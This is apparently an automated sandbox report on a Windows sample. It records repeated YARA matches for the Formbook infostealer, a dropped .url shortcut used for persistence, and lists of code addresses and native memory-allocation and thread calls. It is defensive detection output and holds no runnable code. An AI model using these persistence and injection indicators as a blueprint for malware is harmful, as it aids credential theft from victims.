Source: 9.1.WZ454554.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.1.WZ454554.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 17.0.Hyrzbcwcas.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.0.Hyrzbcwcas.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 21.0.Hyrzbcwcas.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 21.0.Hyrzbcwcas.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000000.360550532.00000000100E2000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000000.360550532.00000000100E2000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000014.00000002.559491799.00000000030A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000014.00000002.559491799.00000000030A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000014.00000002.556874060.0000000002B10000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000014.00000002.556874060.0000000002B10000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.407793404.00000000005E0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.407793404.00000000005E0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000015.00000000.418862410.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000015.00000000.418862410.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.428947591.00000000005A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.428947591.00000000005A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000015.00000002.436930793.00000000008F0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000015.00000002.436930793.00000000008F0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000015.00000000.419325156.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000015.00000000.419325156.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000000.324007988.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000000.324007988.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000000.399621636.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000000.399621636.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000015.00000002.436845866.00000000008C0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000015.00000002.436845866.00000000008C0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000001.400349591.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000001.400349591.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.407506141.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.407506141.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000001.324511598.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000001.324511598.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000015.00000002.436315053.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000015.00000002.436315053.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000000.400048444.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000000.400048444.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.407725220.00000000005B0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.407725220.00000000005B0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.429108861.00000000005D0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.429108861.00000000005D0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001C.00000002.437292259.0000000002AD0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001C.00000002.437292259.0000000002AD0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000014.00000002.559355148.0000000003070000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000014.00000002.559355148.0000000003070000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000015.00000001.419503342.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000015.00000001.419503342.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000000.324380363.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000000.324380363.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000019.00000002.431106841.0000000003000000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000019.00000002.431106841.0000000003000000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.428671777.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.428671777.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\user\Contacts\sacwcbzryH.url, type: DROPPED	Matched rule: Methodology_Shortcut_HotKey author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: C:\Users\user\Contacts\sacwcbzryH.url, type: DROPPED	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019

Detected potential crypto function

Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_00401030	9_2_00401030
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_0041E080	9_2_0041E080
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_0041D976	9_2_0041D976
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_00401208	9_2_00401208
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_0041DAA0	9_2_0041DAA0
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_0041EB1E	9_2_0041EB1E
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_0041ED4D	9_2_0041ED4D
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_0041E522	9_2_0041E522
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_0041D583	9_2_0041D583
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_00402D8B	9_2_00402D8B
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_00402D90	9_2_00402D90
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_00409E5B	9_2_00409E5B
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_00409E60	9_2_00409E60
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_0041EF49	9_2_0041EF49
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_0041E71D	9_2_0041E71D
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_0041E799	9_2_0041E799
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_00402FB0	9_2_00402FB0
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_00AE20A0	9_2_00AE20A0
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_00B820A8	9_2_00B820A8
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_00ACB090	9_2_00ACB090
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_00B828EC	9_2_00B828EC
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_00B8E824	9_2_00B8E824
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_00ADA830	9_2_00ADA830
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_00B71002	9_2_00B71002
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_00AD99BF	9_2_00AD99BF
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_00AD4120	9_2_00AD4120
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_00ABF900	9_2_00ABF900
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_00B822AE	9_2_00B822AE
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_00B6FA2B	9_2_00B6FA2B
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_00AEEBB0	9_2_00AEEBB0
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_00B7DBD2	9_2_00B7DBD2
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_00B703DA	9_2_00B703DA
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00401030	17_2_00401030
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_0041E080	17_2_0041E080
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_0041D976	17_2_0041D976
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00401208	17_2_00401208
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_0041DAA0	17_2_0041DAA0
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_0041EB1E	17_2_0041EB1E
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_0041ED4D	17_2_0041ED4D
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_0041E522	17_2_0041E522
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_0041D583	17_2_0041D583
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00402D8B	17_2_00402D8B
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00402D90	17_2_00402D90
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00409E5B	17_2_00409E5B
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00409E60	17_2_00409E60
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_0041EF49	17_2_0041EF49
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_0041E71D	17_2_0041E71D
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_0041E799	17_2_0041E799
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00402FB0	17_2_00402FB0
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00A920A0	17_2_00A920A0
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00B320A8	17_2_00B320A8
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00A7B090	17_2_00A7B090
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00B328EC	17_2_00B328EC
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00B3E824	17_2_00B3E824
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00B21002	17_2_00B21002
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00A84120	17_2_00A84120
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00A6F900	17_2_00A6F900
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00B322AE	17_2_00B322AE
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00B1FA2B	17_2_00B1FA2B
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00A9EBB0	17_2_00A9EBB0
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00B2DBD2	17_2_00B2DBD2
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00B203DA	17_2_00B203DA
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00B32B28	17_2_00B32B28
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00A8AB40	17_2_00A8AB40
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00A7841F	17_2_00A7841F
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00B2D466	17_2_00B2D466
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00A92581	17_2_00A92581
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00A7D5E0	17_2_00A7D5E0
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00B325DD	17_2_00B325DD
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00A60D20	17_2_00A60D20
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00B32D07	17_2_00B32D07
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00B31D55	17_2_00B31D55
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00B32EF7	17_2_00B32EF7
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00A86E30	17_2_00A86E30
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00B2D616	17_2_00B2D616
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00B31FF1	17_2_00B31FF1
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00B3DFCE	17_2_00B3DFCE

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\WZ454554.exe	Code function: String function: 00ABB150 appears 40 times
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: String function: 00A6B150 appears 48 times

Contains functionality to call native functions

Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_0041A330 NtCreateFile,	9_2_0041A330
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_0041A3E0 NtReadFile,	9_2_0041A3E0
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_0041A460 NtClose,	9_2_0041A460
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_0041A510 NtAllocateVirtualMemory,	9_2_0041A510
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_0041A3DB NtReadFile,	9_2_0041A3DB
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_0041A387 NtReadFile,	9_2_0041A387
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_0041A45A NtClose,	9_2_0041A45A
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_0041A50B NtAllocateVirtualMemory,	9_2_0041A50B
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_00AF98F0 NtReadVirtualMemory,LdrInitializeThunk,	9_2_00AF98F0
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_00AF9860 NtQuerySystemInformation,LdrInitializeThunk,	9_2_00AF9860
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_00AF9840 NtDelayExecution,LdrInitializeThunk,	9_2_00AF9840
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_00AF99A0 NtCreateSection,LdrInitializeThunk,	9_2_00AF99A0
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_00AF9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	9_2_00AF9910
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_00AF9A20 NtResumeThread,LdrInitializeThunk,	9_2_00AF9A20
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_00AF9A00 NtProtectVirtualMemory,LdrInitializeThunk,	9_2_00AF9A00
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_00AF9A50 NtCreateFile,LdrInitializeThunk,	9_2_00AF9A50
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_00AF95D0 NtClose,LdrInitializeThunk,	9_2_00AF95D0
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_00AF9540 NtReadFile,LdrInitializeThunk,	9_2_00AF9540
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_00AF96E0 NtFreeVirtualMemory,LdrInitializeThunk,	9_2_00AF96E0
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_00AF9660 NtAllocateVirtualMemory,LdrInitializeThunk,	9_2_00AF9660
